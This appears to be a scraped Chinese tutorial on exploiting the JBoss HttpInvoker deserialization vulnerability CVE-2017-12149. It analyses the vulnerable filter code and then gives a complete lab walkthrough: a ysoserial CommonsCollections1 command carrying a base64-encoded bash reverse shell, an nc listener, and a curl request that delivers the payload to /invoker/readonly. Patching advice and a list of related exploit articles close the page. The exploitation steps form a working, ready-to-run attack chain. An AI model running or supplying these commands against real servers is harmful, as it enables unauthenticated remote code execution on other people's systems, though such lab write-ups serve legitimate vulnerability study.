2. 程式人生 > >CVE-2017-12149JBoss 反序列化漏洞利用

CVE-2017-12149JBoss 反序列化漏洞利用

阿新 發佈:2018-05-04
命令行 edi AC 頁面 server cto dex form 文件頭

CVE-2017-12149

  • 漏洞描述
    互聯網爆出JBOSSApplication Server反序列化命令執行漏洞(CVE-2017-12149),遠程攻擊者利用漏洞可在未經任何身份驗證的服務器主機上執行任意代碼。漏洞危害程度為高危(High)。
  • 影響範圍
    漏洞影響5.x和6.x版本的JBOSSAS。
  • 漏洞原理
  • JBOSS Application Server是一個基於J2EE的開放源代碼的應用服務器。 JBoss代碼遵循LGPL許可,可以在任何商業應用中免費使用。
  • Java序列化:把Java對象轉換為字節序列的過程
  • Java反序列化:指把字節序列恢復為Java對象的過程。
  • 漏洞分析
  • Java序列化與反序列化作用:便於保存數據,或者進行數據傳輸。
  • Java序列化文件文件頭對於序列化的標識:AC ED 00 05
序列化
FileOutputStream fos = new FileOutputStream(file);
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(st);

反序列化
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);
Student st1 = (Student) ois.readObject();
  • 漏洞出現在 Jboss 的 HttpInvoker組件中的 ReadOnlyAccessFilter 過濾器中,源碼在jboss\server\all\deploy\httpha-invoker.sar\invoker.war\WEB-INF\classes\org\jboss\invocation\http\servlet目錄下的ReadOnlyAccessFilter.class文件中,其中doFilter函數代碼如下:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
    throws IOException, ServletException
  {
    HttpServletRequest httpRequest = (HttpServletRequest)request;
    Principal user = httpRequest.getUserPrincipal();
    if ((user == null) && (this.readOnlyContext != null))
    {
      ServletInputStream sis = request.getInputStream();
      ObjectInputStream ois = new ObjectInputStream(sis);
      MarshalledInvocation mi = null;
      try
      {
        mi = (MarshalledInvocation)ois.readObject();
      }
      catch (ClassNotFoundException e)
      {
        throw new ServletException("Failed to read MarshalledInvocation", e);
      }
      request.setAttribute("MarshalledInvocation", mi);

      mi.setMethodMap(this.namingMethodMap);
      Method m = mi.getMethod();
      if (m != null) {
        validateAccess(m, mi);
      }
    }
    chain.doFilter(request, response);
  }

直接從http中獲取數據,在沒有進行檢查或者過濾的情況下,嘗試調用readobject()方法對數據流進行反序列操作,因此產生了Java反序列化漏洞。

實驗環境

  • 操作機:kali linux 64位。

  • java.lang.runtime.exec() payloads編碼

    實驗工具

  • ysoserial:是一款擁有多種不同利用庫的Java反序列化漏洞payload生成工具,能方便的生成命令執行Payload並序列化。本實驗主要使用生成Payload功能。
  • Github:ysoserial

  • 使用參考博客:java反序列化工具ysoserial分析 – angelwhu

    實驗步驟

    Step:1 ysoserial

  • 在終端輸入firefox http://172.16.12.2:8080打開目標機jboss默認界面。之後進入漏洞頁面http://172.16.12.2:8080/invoker/readonly。http響應碼500(內部服務器錯誤——服務器端的CGI、ASP、JSP等程序發生錯誤),分析猜想,此處服務器將用戶提交的POST內容進行了Java反序列化。
    技術分享圖片
    技術分享圖片

  • 使用工具ysoserial來生成序列化數據,構造POC(Proof Of Concept),使用bash反彈Shellnc接受反彈回來的Shell

  • 從github下載工具ysoserial 後,打開源代碼能看到在處理數據時使用了Runtime.getRuntime().exec(String cmd),此時調用Runtime.getRuntime().exec(String command, String[] envp, File dir),直接構造的字符串會被下面的代碼分割:

/**
     * Constructs a string tokenizer for the specified string. The
     * tokenizer uses the default delimiter set, which is
     * <code>"&nbsp;&#92;t&#92;n&#92;r&#92;f"</code>: the space character,
     * the tab character, the newline character, the carriage-return character,
     * and the form-feed character. Delimiter characters themselves will
     * not be treated as tokens.
     *
     * @param   str   a string to be parsed.
     * @exception NullPointerException if str is <CODE>null</CODE>
     */
    public StringTokenizer(String str) {
        this(str, " \t\n\r\f", false);
    }
  • StringTokenizer會對\t\n\r\f進行分割,所以如果輸入命令
bash -c `bash -i >& /dev/tcp/127.0.0.1/21 0>&1`
  • 會變成
bash
-c
`bash
-i
>&
/dev/tcp/127.0.0.1/21
0>&1`

-此時需要進行編碼,編碼網站,勾選bash
技術分享圖片
註:Linux下的${IFS}也可進行編碼,${IFS}的hex值是0x20 0x09 0x0a,因此不被分割,可以利用在寫shell時的命令中。需要註意是,${IFS}編碼後的命令中有空格,重定時,文件名中有空格會造成命令解析不完整,寫入文件會失敗。而在反彈shell命令中,就會導致模糊的重定向錯誤。

Step:2 構造生成Payload

  • ysoserial的用法:java -jar ysoserial.jar [payload] ‘[command]‘
  • [payload] : 利用庫,根據服務器端程序版本不同而不同,若如報錯,可嘗試跟換其他利用庫。
  • [command] : 待執行的命令。
  • 執行命令:
java  -jar  ysoserial.jar  CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTEuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

技術分享圖片

  • 設置nc本地監聽端口6666nc -l -p 6666
  • 發送請求,獲取Shell。服務器接收到以POST的方式發送的序列化數據,會進行反序列化,執行其中包含的命令,將Shell反彈至Kali機器的6666端口。我們使用curl命令發送請求,打開命令行,執行如下代碼:curl http://172.16.12.2:8080/invoker/readonly --data-binary @poc.ser
    技術分享圖片
  • Shell彈回至nc監聽的端口。
    技術分享圖片

漏洞建議:

  • 升級新版本。
  • 刪除http-invoker.sar 組件。
  • 添加如下代碼至 http-invoker.sarweb.xmlsecurity-constraint 標簽中:<url-pattern>/*</url-pattern>用於對 http invoker 組件進行訪問控制。

參考資料

  • https://github.com/angelwhu/ysoserial
  • http://www.vuln.cn/6295
  • http://jackson.thuraisamy.me/runtime-exec-payloads.html
  • https://www.seebug.org/vuldb/ssvid-96880
  • https://access.redhat.com/security/cve/cve-2017-12149

CVE-2017-12149JBoss 反序列化漏洞利用

相關推薦

CVE-2017-12149JBoss 序列漏洞利用

命令行 edi AC 頁面 server cto dex form 文件頭 CVE-2017-12149 漏洞描述 互聯網爆出JBOSSApplication Server反序列化命令執行漏洞(CVE-2017-12149),遠程攻擊者利用漏洞可在未經任何身份驗證的服務器

記錄WebLogic(CVE-2017-10271)序列漏洞找WEBSHELL地址

記錄WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址 首先,郭姓某牛丟來了一個有weblogic漏洞的地址http://x.x.x.x:7001 說用k8的weblogic2628去getshell不能連結shell,我也試了下,好像確實不能連

Typo3 CVE-2019-12747 序列漏洞分析

1. 前言 TYPO3是一個以PHP編寫、採用GNU通用公共許可證的自由、開源的內容管理系統。 2019年7月16日,RIP

Weblogic XMLDecoder 序列漏洞CVE-2017-10271)檢測與利用復現

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現反序列化漏洞,導致可執行任意命令。 漏洞環境搭建 可以參考: https://blog.csdn.net/q

Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 序列漏洞CVE-2017-10271)

之前本來複現過一次的,結果後來資料丟了,只好再來一遍。 沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。 12.2.1.2.0下載: https://download.oracle.com/otn/nt/middleware/12c/12212/fmw_

WebLogic序列漏洞CVE-2018-2628漏洞檢測與利用

Oracle官方釋出了4月份的關鍵補丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可導致遠端程式碼執行漏洞,漏洞威脅等級為高危,對應的CVE編號為CVE-2018-26 影響版本 Oracle WebLogic Se

JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504)

Red Hat JBoss Application Server 是一款基於JavaEE的開源應用伺服器。JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java檔

JBoss 5.x/6.x 序列漏洞CVE-2017-12149)

該漏洞為 Java反序列化錯誤型別,存在於 Jboss 的 HttpInvoker 元件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的資料流進行反序列化,從而導致了漏洞。 環境 JBoss 5.x/

WebLogic序列漏洞CVE-2017-3248)

使用Java 7和Java 8均可成功復現。 漏洞復現 先啟動weblogic(終端#1) ➜ base_domain ./startWebLogic.sh 在某埠監聽(接收反彈shell) ➜ ysoserial nc -klv 7777 Listeni

Jboss序列漏洞復現(CVE-2017-12149)

Jboss反序列化漏洞復現(CVE-2017-12149) 一、漏洞描述 該漏洞為Java反序列化錯誤型別,存在於jboss的HttpInvoker元件中的ReadOnlyAccessFilter過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的資料流進行反序列化,從而導致了漏洞。 二、

weblogic序列漏洞 cve-2018-3245

type 技術 序列化 int live 查看 efs intent loader weblogic反序列化漏洞 CVE-2018-3245 0x00 針對cve-2018-2893的修復 針對JRMP反序列化修復的方式依舊是增加黑名單:黑名單package:java.rm

ActiveMQ序列漏洞CVE-2015-5254)復現

  0x00 漏洞前言         Apache ActiveMQ是美國阿帕奇(Apache)軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務,叢集,Spring Framework等。Apache ActiveMQ 5.13.0

nodejs & 序列漏洞 & 利用

https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/ node.js是一個伺服器端的執行環境,封裝了Google V8引擎,V8引擎執行JavaScript速度非常快,效能非常好。Node.js

從WebLogic看序列漏洞利用與防禦

0x00 前言 上週出的 WebLogic 反序列漏洞,跟進分析的時候發現涉及到不少 Java 反序列化的知識,然後借這個機會把一些 Java 反序列化漏洞的利用與防禦需要的知識點重新捋一遍,做了一些測試和除錯後寫成這份報告。文中若有錯漏之處,歡迎指出。 0x01 J

Weblogic序列漏洞(CVE-2018-2628),T3協議白名單

 2018年4月18日凌晨,Oracle官方釋出了4月份的關鍵補丁更新,其中包含一個高危的Weblogic反序列化漏洞(CVE-2018-2628),通過該漏洞,攻擊者可以在未授權的情況下遠端執行程式碼。攻擊者只需要傳送精心構造的T3協議資料,就可以獲取目標伺服器的許可權。 

CVE-2020-14644 weblogic iiop序列漏洞

### 0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 ### 0x01 環境準備 1、安裝weblogic server版本。 2、生成wlfullclient.jar包 安裝weblogi

Apache Shiro 1.2.4序列漏洞CVE-2016-4437)復現

# Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現 ## 環境搭建 ``` docker pull medicean/vulapps:s_shiro_1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

php序列漏洞繞過魔術方法 __wakeup

prot poc cte enc repo private 成員 .html blank 0x01 前言 前天學校的ctf比賽,有一道題是關於php反序列化漏洞繞過wakeup,最後跟著大佬們學到了一波姿勢。。 0x02 原理 序列化與反序列化簡單介紹 序列化:把復雜的數據

小白審計JACKSON序列漏洞

ces serialize 簡單 mage 簡單介紹 rac led 代碼審計 ble 1. JACKSON漏洞解析 poc代碼:main.java import com.fasterxml.jackson.databind.ObjectMapper; import co

PHP序列漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字